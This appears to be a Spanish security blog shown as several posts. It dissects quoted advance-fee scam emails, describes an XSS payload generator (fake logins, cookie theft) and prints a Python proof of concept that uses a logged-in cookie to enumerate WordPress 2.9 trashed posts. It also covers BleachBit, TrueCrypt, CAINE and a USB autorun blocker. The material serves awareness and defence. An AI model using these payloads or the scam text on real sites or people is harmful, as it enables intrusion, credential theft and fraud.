No puedo creer que sea una persona tan afortunada, hace poco Me gané 2 Millones de Dolares!!, y ahora Mastercard en asociación con Microsoft han reunido la suma de £952,000.00 (novecientos cincuenta y dos mil libras Gran Bretaña), para regalarlas en un sorteo donde el ganador resulte ser yo!!!.

MASTERCARD ® / MICROSOFT ® PREMIO MAYOR SÚPER INTERNACIONAL.
Director Ejecutivo: Sr. Adam Smith.

ATTENTION: MasterCard/Microsoft Windows Award Winner:

Su dirección de correo electrónico fue seleccionado y confirmado por nuestra Internacional copatrocinador Microsoft, a través de su software más reciente de Internet. Usted ha sido aprobado tanto por MasterCard ® Internacional / Microsoft ® Corporation del Reino Unido la suma de £952,000.00 (novecientos cincuenta y dos mil libras Gran Bretaña). Estos fondos son en efectivo, mediante abono en un cheque de caja válida, con un Reg ganar. (GXC/001620-UK4). Estar informado de que su premio ha sido asegurado y listo para entregar el dinero a usted. Usted está en contacto con su oficial de créditos asignados a continuación con su información requerida es:

Departamento de Verificación de Reclamaciones.

Nombre Srs. Maria Kalsson Nurmi
Correo electrónico: premios10@live.com

Envíe realmente al susodicho Administrador de Reclamaciones por correo electrónico, inmediatamente con este Reclama Exigencias; 1. El Nombre 2 Lleno. Dirección: 3. Nacionalidad: 4. Edad: 5.Ocupación: Naturaleza de Trabajo: 6. Telefonear: Fax: 7. Estado de Origen: País: 8.Sexo: 9. Ganancia de Correo electrónico Dirección:

Modo de Premio Entrega de Remittance:Courier de su Cheque de Ganancia Certificadoy otros Documentos de Ganancia sin peligro a usted.

Atentamente,
Doctor Margarita Munoz.
Diríjasse Cliente Se preocupan el Servicio.
Copyright © 2010 MasterCard Inc el Reino Unido

Si no alcanzaste a notar el tono sarcástico (debería existir una etiqueta para ese fin, de pronto en el HTML 6..), déjame te explico de que se trata todo esto. El correo que acabas de ver anteriormente es una variante de un conocido fraude en Internet llamado “Estafa Nigeria”.

La estafa Nigeriana es un fraude que normalmente se realiza por correo electrónico, consiste en ilusionar a la víctima con una gran fortuna, que en realidad no existe, con el objetivo de persuadirla para que luego envíe una”pequeña” suma de dinero por adelantado como condición para acceder a la supuesta fortuna. Es decir, se le promete a la víctima el todo o parte de una inexistente cantidad millonaria de dinero, para luego convencerla – mediante excusas muy elementales inventadas – a adelantar cierta cantidad de dinero propio al estafador.

Claramente este mensaje en particular, ha sido adaptado para el publico de habla hispana, pero al parecer es un español traducido por Google (note los errores como “Diríjasse Cliente Se preocupan el Servicio.”), al responder el correo, el atacante empezara con sus dotes de ingeniería social (y armado de toda nuestra informacion personal proporcionada), creara una historia personalizada, con la que intentara sacarnos nuestro dinero… pero ¿y si realmente era Mastercard con Microsoft, quien nos envío el correo?, vamos a ver como podemos diferenciar fácilmente una estafa de este tipo de un correo normal.

Como identificar una estafa por Internet?

• TE PIDEN ALGO: Normalmente este tipo de estafas te piden que realices alguna acción, ya sea visitar un enlace, responder el correo, enviar información, llamar a un numero… Cuando veas un correo en el que te piden que realices alguna acción, revisalo muy bien, a menos que confíes plenamente en la persona que te envió el correo y confirmes personalmente que efectivamente esa persona fue quien te envió ese mail, NO HAGAS NADA
  
• TE OFRECEN ALGO A CAMBIO: Es mas fácil que realices una tarea si recibes algo a cambio, por eso siempre te ofrecerán algún beneficio a cambio de tu acción, mejor seguridad en tu cuenta bancaria, trabajo, grandes cantidades de dinero, viajes, objetos, etc..
• DIRECCIONES DE CORREO: Por lo general las direcciones desde las que se envían estos correos dejan mucho que desear, para la muestra, este correo fue enviado desde la cuenta museosenvivo@buenosaires.gob.ar (ya que posiblemente este servidor se encuentre mal configurado o fue vulnerado para enviar correo no deseado), no sabia que microsoft enviaba sus correos desde buenosaires.gob.ar, pero ahí no paran las direcciones sospechosas, en el correo nos dicen que enviemos nuestros datos a premios10@live.com y en la configuración del correo esta la cuenta premioss@live.com como la opción de respuesta por defecto.. ¿realmente crees que Microsoft y Mastercard enviarian un premio de estos, desde cuentas gratuitas de correo?… y mas con esos nombres….

Afortunadamente para este tipo de fraudes por correo electrónico la solución es muy simple, identificar que se trata de una estafa, denunciar el correo como Spam (si tu cliente de correo lo permite) para evitar que le llegue a mas gente y eliminar el mensaje.

Te sugiero sigas las recomendaciones que encontraras en estos artículos de la comunidad:

• Protegerse de las estafas en Internet
• ¿Que es el Phishing?
• Phishing a Movistar Colombia
• Phishing en Bancolombia

También puede interesarte...

• Me gané 2 Millones de Dolares!!
• Sena Virtual Cursos Gratis de Informática
• Phishing a Movistar Colombia
• Vinton Cerf (Creador de Internet) en Colombia
• Descargar Windows 7 Release Candidate 1
• Actualiza tu equipo con Windows
• Descargar Gratis Internet Explorer 8 Final
• Nueva Versión del CAINE, LiveCD para Informática Forense

XCampo es un generador de payloads XSS que nos brinda la posibilidad de sacarle mas jugo a una vulnerabilidad de este tipo en un sitio web, después de seleccionar el payload deseado, nos generara el código y seleccionamos si deseamos aplicarle rawurlencode() o quitarle las comillas:

De momento los payloads con los que cuenta la herramienta son:

• Fake login: Genera un div sobre el resto de la pagina con un campo de login falso. Los datos se envían al sitio web que nosotros queramos y ya ahí somos responsables de hacer lo que queramos con el usuario.
• hax0r defacement: Intenta poner un div sobre toda la pagina, incluir un texto e incluso reproducir una cancion.
• Form redirection: Muy útil en ataques XSS que se encuentran en las paginas de login. Cambia el evento action de todos los forms a la dirección que le digamos. Ademas elimina cualquier tipo de Javascript de validación que existiera, por si acaso!
• Password managers: La idea es, haciendo uso de Javascript, robar la informacion que los navegadores autocompletan cuando hemos guardado el usuario y contraseña en una pagina. Por ahora solo esta implementado el de Internet Explorer, pero el de Firefox no seria dificil de hacer.
• Session cookies: Lo mas típico! Podemos enviar las cookies de un navegador hacia el dominio que queramos. Ademas existen tres maneras de hacerlo:
  • iframe
  • img
  • pop-up

Aunque es un proyecto joven, promete ser una buena herramienta para enviar el típico alert(hola);, si deseas utilizar el X Campo, puedes hacerlo online entrando a esta url (no es la ultima versión) o descargar el código fuente desde Google Code y montarlo en tu propio sistema (la ultima versión).

Mas Información:
Pagina Oficial del XCampo

También puede interesarte...

• ¿Cómo aprender a programar en JavaScript?
• Mastercard y Microsoft me premiaron!!
• Me gané 2 Millones de Dolares!!
• Recupera informacion de un CD o DVD rayado
• Pueden leer tu “Basura”
• Bits y Qubits, El camino de la criptografía – Parte I
• Como realizar un borrado seguro usando BleachBit
• Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)

Así es, la persona que les escribe estas lineas es Millonaria!!… acabo de recibir una carta de la Fundación Carlos Slim en la que me informan que he salido beneficiado para recibir la suma de 2 Millones de Dolares en efectivo… ¿no me creen?… miren el correo.

Antes de que me envíes un correo pidiéndome dinero prestado, déjame te explico de que se trata todo esto. El correo que acabas de ver anteriormente es una variante de un conocido fraude en Internet llamado “Estafa Nigeria”.

La estafa Nigeriana es un fraude que normalmente se realiza por correo electrónico, consiste en ilusionar a la víctima con una gran fortuna, que en realidad no existe, con el objetivo de persuadirla para que luego envíe una”pequeña” suma de dinero por adelantado como condición para acceder a la supuesta fortuna. Es decir, se le promete a la víctima el todo o parte de una inexistente cantidad millonaria de dinero, para luego convencerla – mediante excusas muy elementales inventadas – a adelantar cierta cantidad de dinero propio al estafador.

Claramente este mensaje en particular, ha sido adaptado para el publico latino,  por lo que se ha involucrando a Carlos Slim (la persona mas rica del mundo según Forbes) y esta escrito en un español bien trabajado, al responder el correo, el atacante empezara con sus dotes de ingeniería social (y armado de toda nuestra informacion personal proporcionada), creara una historia personalizada, con la que intentara sacarnos nuestro dinero… pero ¿y si realmente era la Fundación de Carlos Slim?, vamos a ver como podemos diferenciar fácilmente una estafa de este tipo de un correo normal.

Como identificar una estafa por Internet?

• TE PIDEN ALGO: Normalmente este tipo de estafas te piden que realices alguna acción, ya sea visitar un enlace, responder el correo, enviar informacion, llamar a un numero… Cuando veas un correo en el que te piden que realices alguna acción, revisalo muy bien, a menos que confíes plenamente en la persona que te envió el correo y confirmes personalmente que efectivamente esa persona fue quien te envió ese mail, NO HAGAS NADA
  
• TE OFRECEN ALGO A CAMBIO: Es mas fácil que realices una tarea si recibes algo a cambio, por eso siempre te ofrecerán algún beneficio a cambio de tu acción, mejor seguridad en tu cuenta bancaria, trabajo, grandes cantidades de dinero, viajes, objetos, etc..
• DIRECCIONES DE CORREO: Por lo general las direcciones desde las que se envían estos correos dejan mucho que desear, para la veracidad de su historia, en muchos casos se ve como mandan los correos desde la cuenta info@hi5.com (ya que logra pasar la mayoría de filtros y llegar a la bandeja de entrada), o como en este caso los correos no cuadran con la historia, primero que todo el mensaje es enviado desde korporat@kelaptan.gov.my que nada tiene que ver con la fundación carlos slim“, segundo el correo de respuesta es carlosslim_grants@live.co.uk, una cuenta que cualquier personas puede crear (muy diferente a yo@carlosslim.com)

Afortunadamente para este tipo de fraudes por correo electrónico la solución es muy simple, identificar que se trata de una estafa, denunciar el correo como Spam (si tu cliente de correo lo permite) para evitar que le llegue a mas gente y eliminar el mensaje.

Te recomiendo que sigas las recomendaciones que encontraras en estos artículos de la comunidad:

• Protegerse de las estafas en Internet
• ¿Que es el Phishing?
• Phishing a Movistar Colombia
• Phishing en Bancolombia

También puede interesarte...

• Mastercard y Microsoft me premiaron!!
• Phishing a Movistar Colombia
• Vinton Cerf (Creador de Internet) en Colombia
• Nueva Versión del CAINE, LiveCD para Informática Forense
• Sena Virtual Cursos Gratis de Informática
• Ver, Eliminar, Redactar correo de GMail sin Internet
• Capacitación gratuita para realizar el CEH de EC-Council
• IntyPedia – Enciclopedia visual de la Seguridad Informática

Normalmente, lo que haría una persona, seria mandar a “pulir” (de forma profesional o con algún método casero) el CD o DVD para eliminar los rayones que se encuentran en la capa exterior de su superficie, pero este procedimiento muchas veces termina con eliminar definitivamente la información y volver más delicado el disco.

DVDisaster es una herramienta de seguridad que permite crear un archivo de corrección de errores para prevenir posibles pérdidas de información en un dispositivo de almacenamiento óptico, ya sea un CD o un DVD.

El funcionamiento de DVDisaster es bien sencillo. En primer lugar, analiza el disco para comprobar la velocidad de lectura de la unidad y la legibilidad del disco; el segundo paso consiste en crear el archivo de corrección de errores y si fuera necesario, el tercer y cuarto paso permiten volver a analizar el disco y restaurar los posibles defectos a partir de él.

Descargar DVDisaster para Recuperar tu Información en CD o DVD

Más Información:
Pagina Oficial de DVDisaster
Completo Articulo en Kriptopolis

También puede interesarte...

• ¿Cómo Recuperar una Cuenta de MSN Messenger / Hotmail?
• Recupera tu Password de FileZilla
• Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad
• Recupera tu Password de Facebook
• Recupera tu Password de Twitter
• Mastercard y Microsoft me premiaron!!
• TrueCrypt – Cifra tu información en particiones virtuales
• X Campo – Generador de payloads XSS

Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada “papelera“, con la cual todos los artículos, comentarios o páginas “borradas” pasarían a la “papelera de reciclaje” para prevenir así que sean eliminados de forma accidental.

Lo que descubrió Thomas Mackenzie es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la “papelera”, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos… cosa que Mackenzie pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra “papelera”.

#/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post ID’s as an authenticated and unauthenticated user.
# If the requests differ a ‘Trash’ post has been found.
#
# You will need an authenticated user cookie of any priveledge to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the ‘/?p={int}’ parameter. Would need to handle redirects (3xx) to handle all URL types.
#
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

import httplib

# Declare vars
blogURL = “www.example.com”
userCookie = “enter_cookie_here”
postID = 0 #Leave at 0

conn = httplib.HTTPConnection(blogURL)
Headers = {“Cookie” : userCookie}

print
print “Target = http://” + blogURL + “/?p=” + str(postID)
print

while 1:

# Start non authenticated enumeration

request = ‘/?p=’ + str(postID)
conn.request(“GET”, request, “”)

try:
r1 = conn.getresponse()
except:
print “Connection error”

data1 = r1.read()

# Start authenticated enumeration

conn.request(“GET”, request, None, Headers)

try:
r2 = conn.getresponse()
except:
print “Connection error”

data2 = r2.read()

# Compare the HTML body reponses

if data1 != data2:
print “+ Found! http://” + blogURL + request
else:
print request

postID += 1

conn.close()

Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que actualicen su instalación de WordPress a la versión 2.9.2 que ya cuenta con un parche para este problema de seguridad.

Una vez más queda confirmado que la seguridad por “oscuridad”  no es una buena práctica y siempre debe estar acompañada con otras medias que garanticen la confidencialidad, integridad y disponibilidad de nuestra información.

PD. Lo que no entiendo es por que páginas como DaboWeb y Mangas Verdes hablan de este fallo y afirman que un posible atacante puede “Eliminar artículos de nuestro WordPress” ¿De donde habrán sacado esa informacion?…

También puede interesarte...

• Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress
• Como realizar un borrado seguro usando BleachBit
• Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5
• Denegacion de Servicio en WordPress
• Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3
• WordPress 2.6.3 vulnerable a Cross Site Scripting
• 101 Libros de Seguridad Informática Gratis
• BugCON 2012

La instalación es muy sencilla,  pueden descargar el paquete para su sistema operativo (si es GNU/Linux pueden descargar el paquete según su distribución), o si lo prefieren aquellos usuarios de debian y derivados pueden descargar la herramienta desde los repositorios:

apt-get install bleachbit

Ejecutamos nuestra aplicacion ubicada en aplicaciones-herramientas del sistema-bleachbit y veremos algo como esto:

En esta pantalla pueden escoger los datos que desean eliminar,  hay datos de muchas aplicaciones como  amsn, apt, evolution entre otros,  después de haber seleccionado las opciones,  damos click en borrar y esperamos que la herramienta haga su trabajo. En el proceso pueden salir errores, generalmente son problemas de permisos para borrar archivos, para evitar esto pueden entrar a bleachbit con permisos de root.

Por otra parte, bleachbit nos ofrece una exploración profunda, de esta forma la aplicacion escaneara todo el disco duro buscando archivos como:

• Thumbs.db
• Copias de seguridad
• archivos basura

Hay que tener en cuenta que todos los archivos que borremos podrán ser recuperados, para hacer “irrecuperables” estos archivos debemos activar la casilla de sobre escribir archivos para ocultar su contenido, ubicada en el  menú de preferencias:

Ahora si lo que deseamos es triturar o eliminar algunos archivos específicos podemos hacerlo con esta aplicacion, debemos ir a archivo y escoger la opción de triturar archivos,  posteriormente buscamos los archivos a eliminar y eso es todo.

Como pueden ver bleachbit es una herramienta  muy completa para borrar  no solamente la basura de tu sistema, sino también aquellos archivos que nadie puede ver.

Mas Información:
Pagina Oficial de BleachBit

También puede interesarte...

• Manual de TrueCrypt
• Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB
• X5S – Encuentra fallos XSS, LFI y RFI fácilmente
• Lista de tareas para revisar la seguridad en proyectos PHP
• Como detectar y prevenir escalada de privilegios en GNU/Linux
• Binging – Footprinting utilizando Bing
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Instalando Varios Sistemas Operativos en un Acer One – Parte I

En la comunidad Seifreed ha realizado una serie de manuales muy graficos y paso a paso de TrueCrypt, que van desde su instalación hasta el uso de la herramienta, los dejo a continuación con la primera parte del manual:

Bueno voy hablaros de TrueCrypt un software que permite crear un volumen virtual cifrado en un archivo de forma rápida y transparente. Lo que hace TrueCrypt es crear un “volumen secreto”, que consiste en un archivo que puede tener cualquier nombre y que TrueCrypt puede montar como una unidad de disco, con su identificación respectiva, según el sistema operativo utilizado. El contenido de ese archivo tiene su propio sistema de archivos y todo lo necesario para operar como una unidad común de almacenamiento. Lo que se grabe en esa unidad virtual se cifra usando tecnología punta y con la potencia de cifrado que el usuario elija. Cuando se “monta” la unidad a través de TrueCrypt, se pide la contraseña que el usuario escogió al momento de crear este archivo secreto.

Fuente

Bien hare una guía sobre todas las funcionalidades de TrueCrypt que irá dividida en varias partes.

En la primera veremos crear un volumen cifrado con TrueCrypt y poder llevárnoslo a donde queramos.

Bajamos el software de la página principal

TrueCrypt

Y luego nos bajamos el paquete de idiomas para TrueCrypt

Idiomas

Para instalar TrueCrypt no tiene demasiada complicación es siguiente siguiente hasta finalizar aunque tendremos que escoger si lo queremos para PC o en un USB:

En el caso que sea para instalar en PC local ponemos install y en el caso de que sea para USB ponemos Extract

Para instalar el paquete de idiomas descomprimimos el paquete  de idiomas dentro de la carpeta

C:\Archivos de Programa\TrueCrypt

Una vez instalado lo iniciamos nos saldrá esto:

Una vez nos salga esta pantallita le damos a Crear Volumen y entonces nos saldrá el tipo de volumen que queramos crear:

Aqui podemos hacer tres cosas, :
Create and Encrypted file container: crear un “Baul” en donde dentro pondremos los archivos y cuando se monte dicho baul es decir se quiera mirar lo que hay dentro se montará como disco duro virtual.

Encrypt a non-systempartition/Drive: Esta opción encriptará una partición o un disco duro externo.

Encriptar la partición del sistema o la unidad system: Esto cifrará la partición del sistema actual es decir normalmente la C:

Nosotros dejaremos la primera opción, y le daremos a siguiente.

Entonces nos saldrá algo así:

Podemos crear un volumen comun que o un volumen escondido de Truecrypt la diferencia es que en el escondido creas un volumen truecrypt dentro de otro volumen truecrypt

Nosotros escojeremos la primera opción y le daremos a siguiente aquí nso saldrá algo así:

Aqui seleccionaremos donde guardaremos el baul que contendrá nuestros archivos cifrados, elejimos una ruta donde lo guardamos:

Como veis ahi está en mi caso la ruta donde se guardarán los archivos, le damos a siguiente y nos encontraremos con el tipo de encriptacióna  cojer,

Hay diferentes tipos de encriptación buscad por ahí las especificaciones de cada una y escojed la que mas se adeque a vuestras necesidades.

La cojemos y le damos a siguiente:

En mi caso  he cojido 50 Mb no necesito mas, a de quedar una cosa clara.
El baul creado por TrueCrypt una vez creado NO se le puede cambiar el tamaño asi que aseguraros de cojer bien el tamaño que necesiteis entonces le damos a siguiente:

Aquí esta muy claro lo que hemos de hacer que es ponerle una contraseña al Volumen que crearemos, luego le damos a siguiente:

Ahora en este paso estamos creando la encriptación del volumen, si movemos el raton encima de lo de Pool Aletorio

haremos que la encriptación sea mejor, una vez que pensemos que ya estará bien encriptado le damos a Formatear

Una vez que haya acabado nos saldrá este mensaje:

Vale ahora una vez hayamos creado el volumen vamos a aprender a montar el volumen para su uso posterior, es decir poder guardar nuestros archivos en el baul cifrado. Abrimos true Crypt le damos a Seleccionatr Archivo cojemos el archivo cifrado que hayamos echo y le damos a montar, nos pedirá password pero le ponemos la que habíamos configurado previamente

Una vez hayamos metido la contraseña nos montara una unidad de disco duro que será donde deberemos guardar nuestros archivos hemos de escojer una letra para montar la unidad:

Como veis me la ha creado con la letra C:, vamos a MI PC  a comprobar si es verdad:

Como veis ahí está la partición donde podremos nuestros datos cifrados

Y hasta aquí la primera parte de Usando TrueCrypt, para continuar con la segunda parte del articulo pueden entrar al Foro de La Comunidad DragonJAR en el post Usando TrueCrypt-Parte II

Mas Información:
Pagina Oficial de TrueCrypt
Segunda Parte del Manual

También puede interesarte...

• Como realizar un borrado seguro usando BleachBit
• TrueCrypt – Cifra tu información en particiones virtuales
• Almacenamiento Online de 10GB Gratis
• Nueva versión de Cain & Abel
• Instalando Varios Sistemas Operativos en un Acer One – Parte I
• Nueva Versión del CAINE, LiveCD para Informática Forense
• CodeWeavers CrossOver Pro y Games Gratis
• File-Encryptor.com, Encripta y desencripta tus datos de manera OnLine

Estos son los cambios de la nueva versión:

• Se incorpora el WinTaylor, un frontend de analisis forense para entornos windows
• Paginas HTML compatibles con internet explorer para correr herramientas forenses en Windows
• Actualizado el Ntfs-3g a la versión 2009.1.1 (resolviendo un bug del ntfs-3g)
• Nueva opción del menú de inicio: Modo Texto
• Actualizados los paquetes de Ubuntu 8.04 (CAINE esta basado en ubuntu)
• Nueva versión del Firefox 3.0.6
• Nueva herramienta para realizar hashing de archivos (Gtkhash)
• Nuevas opciones en los reportes: se agrego el nombre del investigador y del reporte
• Reportes en múltiples lenguajes: italiano, ingles, alemán, francés y portugués ¿para cuando en español?
• Cuando se inicia Firefox se abre un listado con las herramientas y un breve manual de utilización.

Descargar CAINE 0.5 LiveCD para Informática Forense

También puede interesarte...

• CAINE – Distribución Live CD para Análisis Forense
• Manual de Metasploit Framework en Español
• Instalación, Configuración y Uso del Microsoft Cofee
• Nueva versión de Cain & Abel
• Manual de TrueCrypt
• Información para Reto Forense Campus party 2011
• Dominando el Metasploit Framework
• Documental sobre Arduino en Español

Tendremos que usar ese tipo de billeteras ya que en un metro, transmilenio o cualquier sistema de transporte masivo seria muy sencillo ser victimas del robo de información en tarjetas de crédito RFID.

También puede interesarte...

• The Real Hustle – Los fraudes al descubierto
• SEG-USB herramienta gratuita para prevenir el robo de información en dispositivos USB
• ¿Cómo Recuperar una Cuenta de Twitter?
• ¿Cómo Recuperar una Cuenta de Facebook?
• Análisis de tráfico con Wireshark
• Mastercard y Microsoft me premiaron!!
• Repositorio con Herramientas de Seguridad
• X Campo – Generador de payloads XSS

El siguiente ejemplo encontrado en un foro nos demuestra lo fácil que es crear un dispositivo USB para obtener datos de nuestra maquina sin nuestro consentimiento:

En poco minutos podemos conseguir una herramienta para obtener datos de un tercero.
La aplicación gratuita SEG-USB.EXE previene el auto arranqué en dispositivos USB, evitando la ejecución automática de programas sin nuestro consentimiento. El programa contiene dos opciones:

• Prevenir el uso automático de dispositivos removibles USB
  PREVENCIÓN ACTIVADA

• Configuración original en de dispositivos removibles USB
  PREVENCIÓN DESACTIVADA

La opción prevención activada nos modifica una clave en registro de nuestra maquina para impedir el autorun de los dispositivos USB, esta clave es la siguiente:

HKLM\SYSTEM\ControlSet001\Services\USBSTOR\Start

La opción prevención desactivada restaura la opción de nuestro registro al valor original.
Solo hace falta usarlo una vez para activar o desactivar la opción seleccionada.
Esta aplicación gratuita es valida para maquinas con sistema Microsoft.

Descargar SEG-USB
Mirror de la Comunidad (password: www.dragonjar.org)
Más información y fuente del recurso (José María Luque Guerrero): Internautas.org

También puede interesarte...

• BackTrack Portable
• Wireshark Portable
• La Alarma definitiva para tu Portátil
• Listado de Anti Virus “en la Nube”
• Herramienta Anti Forense para Windows
• Memoria USB Booteable con Varias Distribuciones de Seguridad Informática
• Manual de TrueCrypt
• Video: Robar Informacion tarjetas de crédito con RFID